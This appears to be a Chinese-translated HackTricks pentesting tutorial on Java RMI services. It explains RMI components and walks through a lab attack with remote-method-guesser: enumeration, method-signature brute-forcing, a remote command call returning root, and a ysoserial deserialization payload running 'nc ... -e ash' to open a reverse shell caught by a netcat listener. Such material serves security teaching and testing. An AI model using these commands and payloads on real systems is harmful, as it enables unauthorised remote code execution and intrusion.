# 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
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## 基本信息
_Java远程方法调用_,或_Java RMI_,是一种面向对象的_RPC_机制,允许一个位于一个_Java虚拟机_中的对象调用另一个_Java虚拟机_中的对象的方法。这使得开发人员可以使用面向对象的范式编写分布式应用程序。可以在[这个黑帽演讲](https://youtu.be/t\_aw1mDNhzI?t=202)中找到关于从攻击者角度对_Java RMI_的简短介绍。
1090/tcp open ssl/java-rmi Java RMI
9010/tcp open java-rmi Java RMI
37471/tcp open java-rmi Java RMI
40259/tcp open ssl/java-rmi Java RMI
通常,只有默认的Java RMI组件(RMI注册表和激活系统)绑定到常见的端口。实际实现RMI应用程序的远程对象通常绑定到随机端口,如上面的输出所示。
## RMI组件
简单来说,Java RMI允许开发人员在网络上提供Java对象。这打开了一个TCP端口,客户端可以连接并调用相应对象上的方法。尽管听起来很简单,但Java RMI需要解决几个挑战:
1. 要通过Java RMI分派方法调用,客户端需要知道目标对象的IP地址、监听端口、实现的类或接口以及ObjID(ObjID是在对象在网络上可用时创建的唯一随机标识符。它是必需的,因为Java RMI允许多个对象在同一个TCP端口上监听)。
2. 远程客户端可以通过调用暴露对象上的方法在服务器上分配资源。Java虚拟机需要跟踪哪些资源仍在使用中,哪些可以进行垃圾回收。
第一个挑战由RMI注册表解决,它基本上是Java RMI的命名服务。RMI注册表本身也是一个RMI服务,但实现的接口和ObjID是固定的,并且所有RMI客户端都知道。这使得RMI客户端只需知道相应的TCP端口就可以使用RMI注册表。
import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
import lab.example.rmi.interfaces.RemoteService;
public class ExampleClient {
private static final String remoteHost = "";
private static final String boundName = "remote-service";
public static void main(String[] args)
try {
Registry registry = LocateRegistry.getRegistry(remoteHost); // Connect to the RMI registry
RemoteService ref = (RemoteService)registry.lookup(boundName); // Lookup the desired bound name
String response = ref.remoteMethod(); // Call a remote method
} catch( Exception e) {
上述挑战的第二个问题可以通过分布式垃圾回收器(Distributed Garbage Collector,DGC)来解决。DGC是另一个具有众所周知的ObjID值的RMI服务,基本上每个RMI端点都可以使用它。当RMI客户端开始使用RMI服务时,它会向DGC发送一个信息,说明相应的远程对象正在使用中。DGC可以跟踪引用计数,并能够清理未使用的对象。
除了已弃用的激活系统(Activation System)之外,这些是Java RMI的三个默认组件:
1. RMI注册表(ObjID = 0)
2. 激活系统(ObjID = 1)
3. 分布式垃圾回收器(ObjID = 2)
Java RMI的默认组件已经是已知的攻击向量很长时间了,过时的Java版本中存在多个漏洞。从攻击者的角度来看,这些默认组件很有趣,因为它们实现了已知的类/接口,很容易与它们进行交互。但对于自定义的RMI服务来说,情况就不同了。要调用远程对象的方法,您需要事先知道相应的方法签名。如果不知道现有的方法签名,就无法与RMI服务进行通信。
## RMI枚举
[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)是一个Java RMI漏洞扫描工具,能够自动识别常见的RMI漏洞。每当您发现一个RMI端点时,都应该尝试使用它:
$ rmg enum 9010
[+] RMI registry bound names:
[+] - plain-server2
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
[+] - legacy-service
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
[+] - plain-server
[+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] Endpoint: iinsecure.dev:37471 TLS: no ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+] RMI server codebase enumeration:
[+] - http://iinsecure.dev/well-hidden-development-folder/
[+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
[+] --> de.qtc.rmg.server.interfaces.IPlainServer
[+] RMI server String unmarshalling enumeration:
[+] - Caught ClassNotFoundException during lookup call.
[+] --> The type java.lang.String is unmarshalled via readObject().
[+] Configuration Status: Outdated
[+] RMI server useCodebaseOnly enumeration:
[+] - Caught MalformedURLException during lookup call.
[+] --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
[+] Configuration Status: Non Default
[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
[+] - Caught NotBoundException during unbind call (unbind was accepeted).
[+] Vulnerability Status: Vulnerable
[+] RMI Security Manager enumeration:
[+] - Security Manager rejected access to the class loader.
[+] --> The server does use a Security Manager.
[+] Configuration Status: Current Default
[+] RMI server JEP290 enumeration:
[+] - DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
[+] Vulnerability Status: Non Vulnerable
[+] RMI registry JEP290 bypass enmeration:
[+] - Caught IllegalArgumentException after sending An Trinh gadget.
[+] Vulnerability Status: Vulnerable
[+] RMI ActivationSystem enumeration:
[+] - Caught IllegalArgumentException during activate call (activator is present).
[+] --> Deserialization allowed - Vulnerability Status: Vulnerable
[+] --> Client codebase enabled - Configuration Status: Non Default
$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+] ObjNum: -4004948013687638236
[+] UID:
[+] Unique: 1442798173
[+] Time: 1640761503828 (Dec 29,2021 08:05)
[+] Count: -32760
## 暴力破解远程方法
不幸的是,_Java RMI_不支持枚举_远程对象_上的方法。尽管如此,可以使用诸如[remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)或[rmiscout](https://github.com/BishopFox/rmiscout)等工具来暴力破解方法签名:
$ rmg guess 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 2550 methods were successfully parsed.
[+] Starting Method Guessing on 3281 method signature(s).
[+] MethodGuesser is running:
[+] --------------------------------
[+] [ plain-server2 ] HIT! Method with signature String execute(String dummy) exists!
[+] [ plain-server2 ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
[+] [ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
[+] [ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
[+] [6562 / 6562] [#####################################] 100%
[+] done.
[+] Listing successfully guessed methods:
[+] - plain-server2 == plain-server
[+] --> String execute(String dummy)
[+] --> String system(String dummy, String[] dummy2)
[+] - legacy-service
[+] --> void logMessage(int dummy1, String dummy2)
[+] --> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] --> String login(java.util.HashMap dummy1)
$ rmg call 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)
$ rmg serial 9010 CommonsCollections6 'nc 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+] Attempting deserialization attack on RMI endpoint...
[+] Using non primitive argument type java.lang.String on position 0
[+] Specified method signature is String execute(String dummy)
[+] Caught ClassNotFoundException during deserialization attack.
[+] Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
[+] Deserialization attack probably worked :)
$ nc -vlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
uid=0(root) gid=0(root) groups=0(root)
* [在JEP 290之后攻击Java RMI服务](https://mogwailabs.de/de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)
* [方法猜测](https://github.com/qtc-de/remote-method-guesser/blob/master/docs/rmg/method-guessing.md)
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://bishopfox.com/blog/rmiscout)
除了猜测之外,你还可以在搜索引擎或_GitHub_中查找遇到的_RMI_服务的接口或实现。在这种情况下,_bound name_和实现类或接口的名称可能会有所帮助。
## 已知接口
$ rmg enum 1090 | head -n 5
[+] RMI registry bound names:
[+] - jmxrmi
[+] --> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
[+] Endpoint: localhost:41695 TLS: no ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]
$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] Name:
[+] JMX Server
[+] Class Name:
[+] - javax.management.remote.rmi.RMIServerImpl_Stub
[+] - javax.management.remote.rmi.RMIServer
[+] Description:
[+] Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
[+] This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
[+] method usually passing a HashMap that contains connection options (e.g. credentials). The return
[+] value (RMIConnection object) is another remote object that is when used to perform JMX related
[+] actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
[+] Remote Methods:
[+] - String getVersion()
[+] - javax.management.remote.rmi.RMIConnection newClient(Object params)
[+] References:
[+] - https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
[+] - https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
[+] Vulnerabilities:
[+] -----------------------------------
[+] Name:
[+] MLet
[+] Description:
[+] MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
[+] other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
[+] is therefore most of the time equivalent to remote code execution.
[+] References:
[+] - https://github.com/qtc-de/beanshooter
[+] -----------------------------------
[+] Name:
[+] Deserialization
[+] Description:
[+] Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
[+] method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
[+] actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
[+] establish a working JMX connection, you can also perform deserialization attacks.
[+] References:
[+] - https://github.com/qtc-de/beanshooter
## Shodan
* `port:1099 java`
## 工具
* [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
* [rmiscout](https://github.com/BishopFox/rmiscout)
* [BaRMIe](https://github.com/NickstaDB/BaRMIe)
## HackTricks 自动命令
Protocol_Name: Java RMI #Protocol Abbreviation if there is one.
Port_Number: 1090,1098,1099,1199,4443-4446,8999-9010,9999 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation #Protocol Abbreviation Spelled out
Name: Enumeration
Description: Perform basic enumeration of an RMI service
Command: rmg enum {IP} {PORT}
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